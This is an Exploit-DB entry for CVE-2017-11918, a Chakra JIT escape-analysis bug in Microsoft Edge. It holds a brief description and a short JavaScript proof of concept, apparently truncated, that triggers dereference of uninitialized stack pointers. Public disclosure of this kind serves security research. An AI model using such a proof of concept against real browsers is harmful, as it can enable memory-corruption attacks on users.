Microsoft Edge Chakra JIT - Escape Analysis Bug

EDB-ID: 43469
Author: Google Security Research
Published: 2018-01-09
CVE: CVE-2017-11918
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 Escape analysis: 

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.


function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];

function main() {
for (let i = 0; i < 0x1000; i++) {

print(opt()); // deref uninitialized stack pointers!


Related Posts